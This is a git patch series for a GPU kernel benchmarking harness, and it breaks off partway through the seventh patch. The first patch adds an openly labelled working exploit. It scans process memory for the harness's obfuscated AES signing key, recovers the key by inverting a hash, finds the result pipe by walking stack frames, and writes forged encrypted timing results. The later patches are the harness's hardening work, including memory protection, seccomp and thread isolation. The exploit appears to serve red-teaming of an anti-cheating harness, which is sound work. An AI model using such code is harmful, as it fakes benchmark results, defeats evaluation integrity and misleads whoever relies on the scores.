From 703be1e5a268a99a12490930f2bc26deecdd691d Mon Sep 17 00:00:00 2001
From: Hasan Emre Dinc <hasanemredinc@gmail.com>
Date: Fri, 27 Mar 2026 17:48:51 +0000
Subject: [PATCH 01/11] exploit: AES key recovery via ObfuscatedHexDigest arena
 scan

---
 exploits/submission_aes_key_recovery.py | 228 ++++++++++++++++++++++++
 1 file changed, 228 insertions(+)
 create mode 100644 exploits/submission_aes_key_recovery.py

diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py
new file mode 100644
index 0000000..204d6ad
--- /dev/null
+++ b/exploits/submission_aes_key_recovery.py
@@ -0,0 +1,228 @@
+"""
+EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan
+=============================================================
+
+The 128MiB arena gets merged into a larger anonymous region in /proc/self/maps.
+We scan the first 64MiB of each large region (enough to cover the arena wherever
+it starts within the merged block). Address validation uses /proc/self/maps
+readable ranges instead of ctypes.string_at on unvalidated pointers (avoids SIGSEGV).
+
+Deferred to kernel() call 2+ — call 1 is the compile run with arena PROT_NONE.
+"""
+
+import ctypes
+import gc
+import os
+import struct
+import sys
+import tempfile
+import subprocess
+import bisect
+
+# ── Compile slow_hash + slow_unhash ───────────────────────────────────────────
+
+_HASH_C = r"""
+#include <stdint.h>
+uint64_t slow_hash(uint64_t p, int rounds) {
+    for (int i = 0; i < rounds; i++) {
+        p ^= p >> 17;
+        p *= 0xbf58476d1ce4e5b9ULL;
+        p ^= p >> 31;
+    }
+    return p;
+}
+uint64_t slow_unhash(uint64_t p, int rounds) {
+    for (int i = 0; i < rounds; i++) {
+        p ^= (p >> 31) ^ (p >> 62);
+        p *= 0x96de1b173f119089ULL;
+        p ^= p >> 17 ^ p >> 34 ^ p >> 51;
+    }
+    return p;
+}
+"""
+
+def _compile_hash_lib():
+    src = tempfile.NamedTemporaryFile(suffix='.c', delete=False, mode='w')
+    src.write(_HASH_C)
+    src.close()
+    so = src.name.replace('.c', '.so')
+    subprocess.run(['gcc', '-O2', '-shared', '-fPIC', '-o', so, src.name],
+                   check=True, capture_output=True)
+    os.unlink(src.name)
+    lib = ctypes.CDLL(so)
+    for fn in (lib.slow_hash, lib.slow_unhash):
+        fn.restype  = ctypes.c_uint64
+        fn.argtypes = [ctypes.c_uint64, ctypes.c_int]
+    return lib
+
+_lib = _compile_hash_lib()
+
+def slow_unhash(val: int, rounds: int = 100_000) -> int:
+    return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds)))
+
+_PAGE_SIZE = 4096
+
+
+def _parse_maps():
+    """
+    Returns:
+      large_anon_rw: list of (start, size) for large (>=4MiB) anonymous rw-p regions
+      readable_starts: sorted list of range starts for binary-search lookup
+      readable_ranges: list of (start, end) for all readable mappings
+    """
+    large_anon_rw = []
+    readable_ranges = []
+
+    with open('/proc/self/maps') as f:
+        for line in f:
+            parts = line.split()
+            if len(parts) < 2:
+                continue
+            perms = parts[1]
+            start, end = (int(x, 16) for x in parts[0].split('-'))
+            size = end - start
+            name = parts[5] if len(parts) >= 6 else ''
+
+            if 'r' in perms:
+                readable_ranges.append((start, end))
+
+            if 'r' in perms and 'w' in perms and name == '' and size >= 4 * 1024 * 1024:
+                large_anon_rw.append((start, size))
+
+    readable_ranges.sort()
+    readable_starts = [s for s, e in readable_ranges]
+    return large_anon_rw, readable_starts, readable_ranges
+
+
+def _is_readable_addr(ptr: int, size: int, starts: list, ranges: list) -> bool:
+    """Check if [ptr, ptr+size) is within a known readable mapping."""
+    if ptr == 0 or ptr % _PAGE_SIZE != 0:
+        return False
+    # ptr must be a canonical user-space address (48-bit)
+    if ptr >= (1 << 47):
+        return False
+    idx = bisect.bisect_right(starts, ptr) - 1
+    if idx < 0:
+        return False
+    _, end = ranges[idx]
+    return ptr + size <= end
+
+
+def _recover_aes_key():
+    large_regions, readable_starts, readable_ranges = _parse_maps()
+
+    print(f"[DBG] {len(large_regions)} large anon regions:")
+    for s, sz in large_regions:
+        print(f"  {s:#x}  {sz//1024//1024}MiB")
+
+    # Scan up to 64MiB of each region looking for ObfuscatedHexDigest pattern:
+    # (slow_hash(page_ptr), Len=32, Offset in [0, PAGE_SIZE-33])
+    # BenchmarkManager is at the arena start; mSignature is ~300-400 bytes in.
+    # Arena may be inside a merged larger region, so scan well past the first 4K.
+    MAX_SCAN = 64 * 1024 * 1024
+
+    unhash_calls = 0
+
+    for region_start, region_size in large_regions:
+        scan_size = min(MAX_SCAN, region_size)
+        try:
+            data = ctypes.string_at(region_start, scan_size)
+        except Exception as e:
+            print(f"[DBG] could not read region {region_start:#x}: {e}")
+            continue
+
+        n = len(data) // 8
+        words = struct.unpack_from(f'<{n}Q', data)
+
+        for i in range(n - 2):
+            w1 = words[i + 1]
+            if w1 != 32:
+                continue
+            w2 = words[i + 2]
+            if w2 > _PAGE_SIZE - 33:
+                continue
+
+            w0 = words[i]
+            if w0 == 0:
+                continue
+
+            # Recover page pointer — validate BEFORE dereferencing
+            page_ptr = slow_unhash(w0)
+            unhash_calls += 1
+
+            if not _is_readable_addr(page_ptr, 32, readable_starts, readable_ranges):
+                continue
+
+            # Safe to read — address is within a known readable mapping
+            try:
+                key_bytes = ctypes.string_at(page_ptr + w2, 32)
+                key_str   = key_bytes.decode('ascii')
+                if all(c in '0123456789abcdef' for c in key_str):
+                    print(f"[DBG] key found in region {region_start:#x}+{i*8:#x} "
+                          f"page={page_ptr:#x} off={w2} (unhash_calls={unhash_calls})")
+                    return key_bytes, key_str
+            except Exception:
+                continue
+
+    print(f"[DBG] exhausted all regions, unhash_calls={unhash_calls}")
+    raise RuntimeError("AES key not found")
+
+
+def _find_out_fd():
+    frame = sys._getframe()
+    while frame is not None:
+        if 'out_fd' in frame.f_locals:
+            obj = frame.f_locals['out_fd']
+            if hasattr(obj, 'fileno'):
+                return obj.fileno()
+        frame = frame.f_back
+    raise RuntimeError("Could not find out_fd")
+
+
+def _infer_repeats():
+    try:
+        import torch
+        count = sum(
+            1 for obj in gc.get_objects()
+            if isinstance(obj, tuple) and len(obj) == 2
+            and isinstance(obj[0], torch.Tensor) and obj[0].is_cuda and obj[0].ndim == 2
+            and isinstance(obj[1], torch.Tensor) and obj[1].is_cuda and obj[1].ndim == 3
+        )
+        if count > 1:
+            return count - 1
+    except Exception:
+        pass
+    return 100
+
+
+def _encrypt(key_bytes: bytes, plaintext: str) -> bytes:
+    from cryptography.hazmat.primitives.ciphers.aead import AESGCM
+    nonce  = os.urandom(12)
+    ct_tag = AESGCM(key_bytes).encrypt(nonce, plaintext.encode('utf-8'), None)
+    return nonce + ct_tag[-16:] + ct_tag[:-16]
+
+
+_call_count = 0
+
+
+def kernel(output, inp):
+    global _call_count
+    _call_count += 1
+
+    # Call 1: inside get_kernel() thread — arena is PROT_NONE
+    if _call_count == 1:
+        return
+
+    # Call 2+: arena is rw-p
+    key_raw, key_str = _recover_aes_key()
+    out_fd  = _find_out_fd()
+    repeats = _infer_repeats()
+
+    print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}")
+
+    lines = ['event-overhead\t0.001 µs']
+    for i in range(repeats):
+        lines.append(f'{i}\t0.420000')
+
+    os.write(out_fd, _encrypt(key_raw, '\n'.join(lines) + '\n'))
+    os._exit(0)

From 44dbc59cba8ce83555ecf9c622a220af45fd13b7 Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Wed, 25 Mar 2026 15:10:51 +0100
Subject: [PATCH 02/11] even more thread separation

---
 csrc/binding.cpp | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/csrc/binding.cpp b/csrc/binding.cpp
index bda14ad..2661a78 100644
--- a/csrc/binding.cpp
+++ b/csrc/binding.cpp
@@ -7,6 +7,7 @@
 
 #include <utility>
 #include <random>
+#include <thread>
 #include "manager.h"
 
 int supervisor_main(int sock_fd);
@@ -22,8 +23,14 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c
     signature.allocate(32, rng);
     auto config = read_benchmark_parameters(input_fd, signature.data());
     auto mgr = make_benchmark_manager(result_fd, std::move(signature), config.Seed, discard, nvtx, landlock, mseal, supervisor_sock_fd);
-    auto [args, expected] = mgr->setup_benchmark(nb::cast<nb::callable>(test_generator), test_kwargs, config.Repeats);
-    mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast<cudaStream_t>(stream));
+    nb::gil_scoped_release release;
+    std::thread run_thread ([&]()
+    {
+        nb::gil_scoped_acquire acquire;
+        auto [args, expected] = mgr->setup_benchmark(nb::cast<nb::callable>(test_generator), test_kwargs, config.Repeats);
+        mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast<cudaStream_t>(stream));
+    });
+    run_thread.join();
 }
 
 

From 177e78b51fda0f137be754304654b1af8c974bf1 Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Wed, 25 Mar 2026 22:49:00 +0100
Subject: [PATCH 03/11] move report generation out of main benchmark function
 (and thus out of main benchmark thread)

---
 csrc/binding.cpp |  2 ++
 csrc/manager.cpp | 19 +++++++++++--------
 csrc/manager.h   |  7 ++++++-
 3 files changed, 19 insertions(+), 9 deletions(-)

diff --git a/csrc/binding.cpp b/csrc/binding.cpp
index 2661a78..ce14f00 100644
--- a/csrc/binding.cpp
+++ b/csrc/binding.cpp
@@ -31,6 +31,8 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c
         mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast<cudaStream_t>(stream));
     });
     run_thread.join();
+    mgr->send_report();
+    mgr->clean_up();
 }
 
 
diff --git a/csrc/manager.cpp b/csrc/manager.cpp
index 01da925..4d01903 100644
--- a/csrc/manager.cpp
+++ b/csrc/manager.cpp
@@ -477,19 +477,19 @@ void BenchmarkManager::do_bench_py(
     mErrorCountShift = noise.at(offset);
 
     // dry run -- measure overhead of events
-    float median_event_time = measure_event_overhead(DRY_EVENTS, stream);
+    mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream);
 
     // create a randomized order for running the tests
-    std::vector<int> test_order(actual_calls);
-    std::iota(test_order.begin(), test_order.end(), 1);
-    std::shuffle(test_order.begin(), test_order.end(), rng);
+    mTestOrder.resize(actual_calls);
+    std::iota(mTestOrder.begin(), mTestOrder.end(), 1);
+    std::shuffle(mTestOrder.begin(), mTestOrder.end(), rng);
 
     std::uniform_int_distribution<unsigned> check_seed_generator(0,  0xffffffff);
 
     nvtx_push("benchmark");
     // now do the real runs
     for (int i = 0; i < actual_calls; i++) {
-        int test_id = test_order.at(i);
+        int test_id = mTestOrder.at(i);
         // page-in real inputs. If the user kernel runs on the wrong stream, it's likely it won't see the correct inputs
         // unfortunately, we need to do this before clearing the cache, so there is a window of opportunity
         // *but* we deliberately modify a small subset of the inputs, which only get corrected immediately before
@@ -522,26 +522,29 @@ void BenchmarkManager::do_bench_py(
         validate_result(mExpectedOutputs.at(test_id), mOutputBuffers.at(test_id), check_seed_generator(rng), stream);
     }
     nvtx_pop();
+}
 
+void BenchmarkManager::send_report() {
     cudaEventSynchronize(mEndEvents.back());
     unsigned error_count;
     CUDA_CHECK(cudaMemcpy(&error_count, mDeviceErrorCounter, sizeof(unsigned), cudaMemcpyDeviceToHost));
     // subtract the nuisance shift that we applied to the counter
     error_count -= mErrorCountShift;
 
-    std::string message = build_result_message(test_order, error_count, median_event_time);
+    std::string message = build_result_message(mTestOrder, error_count, mMedianEventTime);
     message = encrypt_message(mSignature.data(), 32, message);
     fwrite(message.data(), 1, message.size(), mOutputPipe);
     fflush(mOutputPipe);
+}
 
-    // cleanup events
+void BenchmarkManager::clean_up() {
     for (auto& event : mStartEvents) CUDA_CHECK(cudaEventDestroy(event));
     for (auto& event : mEndEvents) CUDA_CHECK(cudaEventDestroy(event));
     mStartEvents.clear();
     mEndEvents.clear();
 }
 
-std::string BenchmarkManager::build_result_message(const std::vector<int>& test_order, unsigned error_count, float median_event_time) const {
+std::string BenchmarkManager::build_result_message(const std::pmr::vector<int>& test_order, unsigned error_count, float median_event_time) const {
     std::ostringstream oss;
 
     oss << "event-overhead\t" << median_event_time * 1000 << " µs\n";
diff --git a/csrc/manager.h b/csrc/manager.h
index 7722c74..fd72ee6 100644
--- a/csrc/manager.h
+++ b/csrc/manager.h
@@ -50,6 +50,8 @@ class BenchmarkManager {
 public:
     std::pair<std::vector<nb::tuple>, std::vector<nb::tuple>> setup_benchmark(const nb::callable& generate_test_case, const nb::dict& kwargs, int repeats);
     void do_bench_py(const std::string& kernel_qualname, const std::vector<nb::tuple>& args, const std::vector<nb::tuple>& expected, cudaStream_t stream);
+    void send_report();
+    void clean_up();
 private:
     friend BenchmarkManagerPtr make_benchmark_manager(int result_fd, ObfuscatedHexDigest signature, std::uint64_t seed, bool discard, bool nvtx, bool landlock, bool mseal, int supervisor_socket);
     friend BenchmarkManagerDeleter;
@@ -113,10 +115,13 @@ class BenchmarkManager {
     std::pmr::vector<Expected> mExpectedOutputs;
     std::pmr::vector<ShadowArgumentList> mShadowArguments;
     std::pmr::vector<nb_cuda_array> mOutputBuffers;
+    std::pmr::vector<int> mTestOrder;
 
     FILE* mOutputPipe = nullptr;
     ObfuscatedHexDigest mSignature;
 
+    float mMedianEventTime = -1.f;
+
     static ShadowArgumentList make_shadow_args(const nb::tuple& args, cudaStream_t stream,
                                                std::pmr::memory_resource* resource);
 
@@ -133,7 +138,7 @@ class BenchmarkManager {
     int run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream);
     nb::callable get_kernel(const std::string& qualname, const nb::tuple& call_args);
 
-    [[nodiscard]] std::string build_result_message(const std::vector<int>& test_order, unsigned error_count, float median_event_time) const;
+    [[nodiscard]] std::string build_result_message(const std::pmr::vector<int>& test_order, unsigned error_count, float median_event_time) const;
 
 
     // debug only: Any sort of test exploit that targets specific values of this class is going to be brittle,

From 0da818de5c96632c6cac79e0ea79064ccb157c14 Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Wed, 25 Mar 2026 23:00:46 +0100
Subject: [PATCH 04/11] refactor

---
 csrc/manager.cpp | 25 +++++++++++++------------
 1 file changed, 13 insertions(+), 12 deletions(-)

diff --git a/csrc/manager.cpp b/csrc/manager.cpp
index 4d01903..519b9e5 100644
--- a/csrc/manager.cpp
+++ b/csrc/manager.cpp
@@ -446,14 +446,8 @@ void BenchmarkManager::do_bench_py(
     setup_test_cases(args, expected, stream);
     install_protections();
 
-    // at this point, we call user code as we import the kernel (executing arbitrary top-level code)
-    // after this, we cannot trust python anymore
-    nb::callable kernel = get_kernel(kernel_qualname, args.at(0));
-
-    // now, run a few more times for warmup; in total aim for 1 second of warmup runs
-    int actual_calls = run_warmup(kernel, args.at(0), stream);
-    constexpr int DRY_EVENTS = 100;
-    const int num_events = std::max(actual_calls, DRY_EVENTS);
+    constexpr std::size_t DRY_EVENTS = 100;
+    const std::size_t num_events = std::max(mShadowArguments.size(), DRY_EVENTS);
     mStartEvents.resize(num_events);
     mEndEvents.resize(num_events);
     for (int i = 0; i < num_events; i++) {
@@ -461,6 +455,16 @@ void BenchmarkManager::do_bench_py(
         CUDA_CHECK(cudaEventCreate(&mEndEvents.at(i)));
     }
 
+    // dry run -- measure overhead of events
+    mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream);
+
+    // at this point, we call user code as we import the kernel (executing arbitrary top-level code)
+    // after this, we cannot trust python anymore
+    nb::callable kernel = get_kernel(kernel_qualname, args.at(0));
+
+    // now, run a few more times for warmup; in total aim for 1 second of warmup runs
+    int actual_calls = run_warmup(kernel, args.at(0), stream);
+
     // pick a random spot for the unsigned
     // initialize the whole area with random junk; the error counter
     // will be shifted by the initial value, so just writing zero
@@ -476,9 +480,6 @@ void BenchmarkManager::do_bench_py(
     mDeviceErrorCounter = mDeviceErrorBase + offset;
     mErrorCountShift = noise.at(offset);
 
-    // dry run -- measure overhead of events
-    mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream);
-
     // create a randomized order for running the tests
     mTestOrder.resize(actual_calls);
     std::iota(mTestOrder.begin(), mTestOrder.end(), 1);
@@ -489,7 +490,7 @@ void BenchmarkManager::do_bench_py(
     nvtx_push("benchmark");
     // now do the real runs
     for (int i = 0; i < actual_calls; i++) {
-        int test_id = mTestOrder.at(i);
+        const int test_id = mTestOrder.at(i);
         // page-in real inputs. If the user kernel runs on the wrong stream, it's likely it won't see the correct inputs
         // unfortunately, we need to do this before clearing the cache, so there is a window of opportunity
         // *but* we deliberately modify a small subset of the inputs, which only get corrected immediately before

From 90b4673b8eec39670853d8e1bd1b993b921d7b8a Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Thu, 26 Mar 2026 00:06:20 +0100
Subject: [PATCH 05/11] also move warmup into protected thread

---
 csrc/manager.cpp | 74 +++++++++++++++++++++++-------------------------
 csrc/manager.h   |  3 +-
 2 files changed, 37 insertions(+), 40 deletions(-)

diff --git a/csrc/manager.cpp b/csrc/manager.cpp
index 519b9e5..5a7d19d 100644
--- a/csrc/manager.cpp
+++ b/csrc/manager.cpp
@@ -336,39 +336,6 @@ void BenchmarkManager::install_protections() {
     install_seccomp_filter();
 }
 
-int BenchmarkManager::run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream) {
-    std::chrono::high_resolution_clock::time_point cpu_start = std::chrono::high_resolution_clock::now();
-    int warmup_run_count = 0;
-    double time_estimate;
-    nvtx_push("timing");
-    while (true) {
-        // note: we are assuming here that calling the kernel multiple times for the same input is a safe operation
-        // this is only potentially problematic for in-place kernels;
-        CUDA_CHECK(cudaDeviceSynchronize());
-        clear_cache(stream);
-        kernel(*args);
-        CUDA_CHECK(cudaDeviceSynchronize());
-        std::chrono::high_resolution_clock::time_point cpu_end = std::chrono::high_resolution_clock::now();
-        std::chrono::duration<double> elapsed_seconds = cpu_end - cpu_start;
-        ++warmup_run_count;
-        if (elapsed_seconds.count() > mWarmupSeconds) {
-            time_estimate = elapsed_seconds.count() / warmup_run_count;
-            break;
-        }
-    }
-    nvtx_pop();
-
-    // note: this is a very conservative estimate. Timing above was measured with syncs between every kernel.
-    int calls = mOutputBuffers.size() - 1;
-    const int actual_calls = std::clamp(static_cast<int>(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls);
-
-    if (actual_calls < 3) {
-        throw std::runtime_error("The initial speed test indicated that running times are too slow to generate meaningful benchmark numbers: " + std::to_string(time_estimate));
-    }
-
-    return actual_calls;
-}
-
 static inline std::uintptr_t page_mask() {
     std::uintptr_t page_size = getpagesize();
     return ~(page_size - 1u);
@@ -381,12 +348,16 @@ void protect_range(void* ptr, size_t size, int prot) {
         throw std::system_error(errno, std::system_category(), "mprotect");
 }
 
-nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb::tuple& call_args) {
+nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream) {
     nb::gil_scoped_release release;
     const std::uintptr_t lo = reinterpret_cast<std::uintptr_t>(this->mArena);
     const std::uintptr_t hi = lo + BenchmarkManagerArenaSize;
 
     nb::callable kernel;
+    double warmup_seconds = mWarmupSeconds;
+    void* cc_memory = mDeviceDummyMemory;
+    std::size_t l2_clear_size = mL2CacheSize;
+    bool discard_cache = mDiscardCache;
     std::exception_ptr thread_exception;
     int sock = mSupervisorSock;
     bool install_notify = mSeal || supports_seccomp_notify();
@@ -398,7 +369,8 @@ nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb:
     // TODO make stack inaccessible (may be impossible) or read-only during the call
     // call the python kernel generation function from a different thread.
 
-    std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception, install_notify]() {
+    std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception,
+                                      install_notify, &time_estimate, warmup_seconds, cc_memory, l2_clear_size, discard_cache, stream]() {
         try {
             if (sock >= 0) {
                 try {
@@ -417,6 +389,24 @@ nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb:
             CUDA_CHECK(cudaDeviceSynchronize());
             kernel(*call_args);
             CUDA_CHECK(cudaDeviceSynchronize());
+
+            // warmup
+            CUDA_CHECK(cudaDeviceSynchronize());
+            auto cpu_start = std::chrono::high_resolution_clock::now();
+            int warmup_run_count = 0;
+
+            while (true) {
+                ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream);
+               kernel(*call_args);
+               CUDA_CHECK(cudaDeviceSynchronize());
+
+               auto elapsed = std::chrono::high_resolution_clock::now() - cpu_start;
+               ++warmup_run_count;
+               if (std::chrono::duration<double>(elapsed).count() > warmup_seconds) {
+                   time_estimate = std::chrono::duration<double>(elapsed).count() / warmup_run_count;
+                   break;
+               }
+            }
         } catch (...) {
             thread_exception = std::current_exception();
         }
@@ -458,12 +448,20 @@ void BenchmarkManager::do_bench_py(
     // dry run -- measure overhead of events
     mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream);
 
+    double time_estimate = 0.0;
     // at this point, we call user code as we import the kernel (executing arbitrary top-level code)
     // after this, we cannot trust python anymore
-    nb::callable kernel = get_kernel(kernel_qualname, args.at(0));
+    nb::callable kernel = initial_kernel_setup(time_estimate, kernel_qualname, args.at(0), stream);
 
-    // now, run a few more times for warmup; in total aim for 1 second of warmup runs
-    int actual_calls = run_warmup(kernel, args.at(0), stream);
+    int calls = mOutputBuffers.size() - 1;
+    const int actual_calls = std::clamp(
+        static_cast<int>(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls);
+
+    if (actual_calls < 3) {
+        throw std::runtime_error(
+            "The initial speed test indicated that running times are too slow to generate "
+            "meaningful benchmark numbers: " + std::to_string(time_estimate));
+    }
 
     // pick a random spot for the unsigned
     // initialize the whole area with random junk; the error counter
diff --git a/csrc/manager.h b/csrc/manager.h
index fd72ee6..c592d93 100644
--- a/csrc/manager.h
+++ b/csrc/manager.h
@@ -135,8 +135,7 @@ class BenchmarkManager {
     void setup_test_cases(const std::vector<nb::tuple>& args, const std::vector<nb::tuple>& expected, cudaStream_t stream);
 
     void install_protections();
-    int run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream);
-    nb::callable get_kernel(const std::string& qualname, const nb::tuple& call_args);
+    nb::callable initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream);
 
     [[nodiscard]] std::string build_result_message(const std::pmr::vector<int>& test_order, unsigned error_count, float median_event_time) const;
 

From cc73f2b40acb0e0fe42d9cd5f89b9413914e5362 Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Thu, 26 Mar 2026 00:24:02 +0100
Subject: [PATCH 06/11] refactor

---
 csrc/manager.cpp | 127 ++++++++++++++++++++++++-----------------------
 1 file changed, 66 insertions(+), 61 deletions(-)

diff --git a/csrc/manager.cpp b/csrc/manager.cpp
index 5a7d19d..fd88829 100644
--- a/csrc/manager.cpp
+++ b/csrc/manager.cpp
@@ -348,81 +348,86 @@ void protect_range(void* ptr, size_t size, int prot) {
         throw std::system_error(errno, std::system_category(), "mprotect");
 }
 
-nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream) {
-    nb::gil_scoped_release release;
-    const std::uintptr_t lo = reinterpret_cast<std::uintptr_t>(this->mArena);
+static void setup_seccomp(int sock, bool install_notify, std::uintptr_t lo, std::uintptr_t hi) {
+    if (sock < 0)
+        return;
+    try {
+        if (install_notify)
+            seccomp_install_memory_notify(sock, lo, hi);
+    } catch (...) {
+        close(sock);
+        throw;
+    }
+    close(sock);
+}
+
+static double run_warmup_loop(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream,
+                              void* cc_memory, std::size_t l2_clear_size, bool discard_cache,
+                              double warmup_seconds) {
+    CUDA_CHECK(cudaDeviceSynchronize());
+    auto cpu_start = std::chrono::high_resolution_clock::now();
+    int run_count = 0;
+
+    while (true) {
+        ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream);
+        kernel(*args);
+        CUDA_CHECK(cudaDeviceSynchronize());
+
+        ++run_count;
+        double elapsed = std::chrono::duration<double>(
+            std::chrono::high_resolution_clock::now() - cpu_start).count();
+        if (elapsed > warmup_seconds)
+            return elapsed / run_count;
+    }
+}
+
+nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname,
+                                                     const nb::tuple& call_args, cudaStream_t stream) {
+    const std::uintptr_t lo = reinterpret_cast<std::uintptr_t>(mArena);
     const std::uintptr_t hi = lo + BenchmarkManagerArenaSize;
 
+    // snapshot all member state needed in the thread before protecting the arena
+    const int sock = mSupervisorSock;
+    const bool install_notify = mSeal || supports_seccomp_notify();
+    const double warmup_seconds = mWarmupSeconds;
+    void* const cc_memory = mDeviceDummyMemory;
+    const std::size_t l2_clear_size = mL2CacheSize;
+    const bool discard_cache = mDiscardCache;
+
     nb::callable kernel;
-    double warmup_seconds = mWarmupSeconds;
-    void* cc_memory = mDeviceDummyMemory;
-    std::size_t l2_clear_size = mL2CacheSize;
-    bool discard_cache = mDiscardCache;
     std::exception_ptr thread_exception;
-    int sock = mSupervisorSock;
-    bool install_notify = mSeal || supports_seccomp_notify();
 
     nvtx_push("trigger-compile");
-
-    // make the BenchmarkManager inaccessible
     protect_range(reinterpret_cast<void*>(lo), hi - lo, PROT_NONE);
-    // TODO make stack inaccessible (may be impossible) or read-only during the call
-    // call the python kernel generation function from a different thread.
-
-    std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception,
-                                      install_notify, &time_estimate, warmup_seconds, cc_memory, l2_clear_size, discard_cache, stream]() {
-        try {
-            if (sock >= 0) {
-                try {
-                    if (install_notify)
-                        seccomp_install_memory_notify(sock, lo, hi);
-                } catch (...) {
-                    close(sock);
-                    throw;
-                }
-                close(sock);
-            }
-            nb::gil_scoped_acquire guard;
-            kernel = kernel_from_qualname(qualname);
-
-            // ok, first run for compilations etc
-            CUDA_CHECK(cudaDeviceSynchronize());
-            kernel(*call_args);
-            CUDA_CHECK(cudaDeviceSynchronize());
-
-            // warmup
-            CUDA_CHECK(cudaDeviceSynchronize());
-            auto cpu_start = std::chrono::high_resolution_clock::now();
-            int warmup_run_count = 0;
-
-            while (true) {
-                ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream);
-               kernel(*call_args);
-               CUDA_CHECK(cudaDeviceSynchronize());
-
-               auto elapsed = std::chrono::high_resolution_clock::now() - cpu_start;
-               ++warmup_run_count;
-               if (std::chrono::duration<double>(elapsed).count() > warmup_seconds) {
-                   time_estimate = std::chrono::duration<double>(elapsed).count() / warmup_run_count;
-                   break;
-               }
+
+    {
+        nb::gil_scoped_release release;
+        std::thread worker([&] {
+            try {
+                setup_seccomp(sock, install_notify, lo, hi);
+
+                nb::gil_scoped_acquire guard;
+
+                kernel = kernel_from_qualname(qualname);
+                CUDA_CHECK(cudaDeviceSynchronize());
+                kernel(*call_args);  // trigger JIT compile
+
+                time_estimate = run_warmup_loop(kernel, call_args, stream,
+                                                cc_memory, l2_clear_size, discard_cache,
+                                                warmup_seconds);
+            } catch (...) {
+                thread_exception = std::current_exception();
             }
-        } catch (...) {
-            thread_exception = std::current_exception();
-        }
-    });
+        });
+        worker.join();
+    }
 
-    make_kernel_thread.join();
-    // make it accessible again. This is in the original thread, so the tightened seccomp
-    // policy does not apply here.
     protect_range(reinterpret_cast<void*>(lo), hi - lo, PROT_READ | PROT_WRITE);
-    // closed now, so set to -1
     mSupervisorSock = -1;
     nvtx_pop();
 
-    if (thread_exception) {
+    if (thread_exception)
         std::rethrow_exception(thread_exception);
-    }
 
     return kernel;
 }

From 66bc9641b2476bd629423d79e0603d56b246c210 Mon Sep 17 00:00:00 2001
From: Erik Schultheis <erik.schultheis@ist.ac.at>
Date: Sat, 28 Mar 2026 00:02:05 +0100
Subject: [PATCH 07/11] fixes

---
 csrc/binding.cpp | 29 ++++++++++++++++++++++-------
 csrc/manager.cpp |  8 ++++++--
 2 files changed, 28 insertions(+), 9 deletions(-)

diff --git a/csrc/binding.cpp b/csrc/binding.cpp
index ce14f00..d093127 100644
--- a/csrc/binding.cpp
+++ b/csrc/binding.cpp
@@ -9,6 +9,7 @@
 #include <random>
 #include <thread>
 #include "manager.h"
+#include "utils.h"
 
 int supervisor_main(int sock_fd);
 
@@ -23,14 +24,28 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c
     signature.allocate(32, rng);
     auto config = read_benchmark_parameters(input_fd, signature.data());
     auto mgr = make_benchmark_manager(result_fd, std::move(signature), config.Seed, discard, nvtx, landlock, mseal, supervisor_sock_fd);
-    nb::gil_scoped_release release;
-    std::thread run_thread ([&]()
+
     {
-        nb::gil_scoped_acquire acquire;
-        auto [args, expected] = mgr->setup_benchmark(nb::cast<nb::callable>(test_generator), test_kwargs, config.Repeats);
-        mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast<cudaStream_t>(stream));
-    });
-    run_thread.join();
+        nb::gil_scoped_release release;
+        std::exception_ptr thread_exception;
+        int device;
+        CUDA_CHECK(cudaGetDevice(&device));
+        std::thread run_thread ([&]()
+        {
+            try {
+                 CUDA_CHECK(cudaSetDevice(device));
+                 nb::gil_scoped_acquire acquire;
+                 auto [args, expected] = mgr->setup_benchmark(nb::cast<nb::callable>(test_generator), test_kwargs, config.Repeats);
+                 mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast<cudaStream_t>(stream));
+             } catch (...) {
+                 thread_exception = std::current_exception();
+             }
+        });
+        run_thread.join();
+        if (thread_exception)
